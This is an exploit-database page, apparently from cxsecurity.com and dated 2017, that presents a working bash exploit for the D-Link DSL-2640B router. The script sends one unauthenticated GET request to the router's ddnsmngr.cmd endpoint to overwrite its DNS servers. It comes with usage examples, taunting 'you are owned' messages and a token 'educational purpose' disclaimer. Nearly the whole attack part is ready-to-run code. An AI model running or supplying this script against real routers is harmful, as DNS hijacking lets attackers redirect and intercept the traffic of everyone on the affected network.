D-Link DSL-2640B Remote DNS Changer

2017.03.24
Credit: cryptolulz666
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/bin/bash # # D-Link DSL-2640B Remote DNS Change Exploit # Description: # Different D-Link Routers are vulnerable to DNS change. # The vulnerability exist in the web interface, which is # accessible without authentication. # # Tested On Linux/ubuntu/Debian/All Other Linux # Compatible Core i86 # Script Bash By Cryptolulz666 # Use This For Educational Purphose if [[ $# -gt 3 || $# -lt 2 ]]; then echo " D-Link DSL-2640B Remote DNS Change Exploit" echo " ================================================================" echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>" echo " Example: $0 192.168.1.1 8.8.8.8" echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4" echo "" echo " Copyright none public " echo " security sucks ass " echo " this server is vuln and you are owned " exit; fi GET=`which GET 2>/dev/null` if [ $? -ne 0 ]; then echo " Error : libwww-perl not found =/" exit; fi GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top